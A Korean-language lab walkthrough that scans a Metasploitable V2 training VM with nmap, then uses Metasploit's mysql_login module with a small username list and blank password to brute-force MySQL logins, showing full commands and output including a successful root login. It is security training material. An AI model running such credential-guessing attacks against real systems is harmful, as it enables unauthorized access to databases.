메타스플로잇을 사용하여 사전 파일을 이용한 MySQL 원격 로그인 시도

- 사용 시스템

Kali Linux

Metasploitable V2 Linux

( Kali )

# nmap -sV 192.168.17.134    /* Metasploit V2 Server IP */

Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-09 19:56 KST mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.17.134 Host is up (0.00010s latency). Not shown: 977 closed ports PORT     STATE SERVICE     VERSION 21/tcp   open  ftp         vsftpd 2.3.4 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp   open  telnet      Linux telnetd 25/tcp   open  smtp        Postfix smtpd 53/tcp   open  domain      ISC BIND 9.4.2 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp  open  rpcbind     2 (RPC #100000) 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp  open  exec        netkit-rsh rexecd 513/tcp  open  login 514/tcp  open  tcpwrapped 1099/tcp open  rmiregistry GNU Classpath grmiregistry 1524/tcp open  shell       Metasploitable root shell 2049/tcp open  nfs         2-4 (RPC #100003) 2121/tcp open  ftp         ProFTPD 1.3.1 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open  vnc         VNC (protocol 3.3) 6000/tcp open  X11         (access denied) 6667/tcp open  irc         UnrealIRCd 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3) 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1 MAC Address: 00:0C:29:FA:DD:2A (VMware) Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.77 seconds

# cd /usr/share/metasploit-framework/data/wordlists

# vi user.txt

root admin administrator

# echo "" > pass.txt

# msfconsole

msf > search mysql_login Matching Modules ================    Name                                 Disclosure Date  Rank    Description    ----                                 ---------------  ----    -----------    auxiliary/scanner/mysql/mysql_login                   normal  MySQL Login Utility msf > use auxiliary/scanner/mysql/mysql_login  msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login):    Name              Current Setting  Required  Description    ----              ---------------  --------  -----------    BLANK_PASSWORDS   false            no        Try blank passwords for all users    BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5    DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database    DB_ALL_PASS       false            no        Add all passwords in the current database to the list    DB_ALL_USERS      false            no        Add all users in the current database to the list    PASSWORD                           no        A specific password to authenticate with    PASS_FILE                          no        File containing passwords, one per line    Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]    RHOSTS                             yes       The target address range or CIDR identifier    RPORT             3306             yes       The target port (TCP)    STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host    THREADS           1                yes       The number of concurrent threads    USERNAME                           no        A specific username to authenticate as    USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line    USER_AS_PASS      false            no        Try the username as the password for all users    USER_FILE                          no        File containing usernames, one per line    VERBOSE           true             yes       Whether to print output for all attempts msf auxiliary(mysql_login) > set RHOSTS 192.168.17.134 RHOSTS => 192.168.17.134 msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt USER_FILE => /usr/share/metasploit-framework/data/wordlists/user.txt msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt PASS_FILE => /usr/share/metasploit-framework/data/wordlists/pass.txt msf auxiliary(mysql_login) > run [*] 192.168.17.134:3306   - 192.168.17.134:3306 - Found remote MySQL version 5.0.51a [+] 192.168.17.134:3306   - MYSQL - Success: 'root:' [-] 192.168.17.134:3306   - 192.168.17.134:3306 - LOGIN FAILED: admin: (Incorrect: Access denied for user 'admin'@'192.168.17.50' (using password: NO)) [-] 192.168.17.134:3306   - 192.168.17.134:3306 - LOGIN FAILED: administrator: (Incorrect: Access denied for user 'administrator'@'192.168.17.50' (using password: NO)) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mysql_login) > quit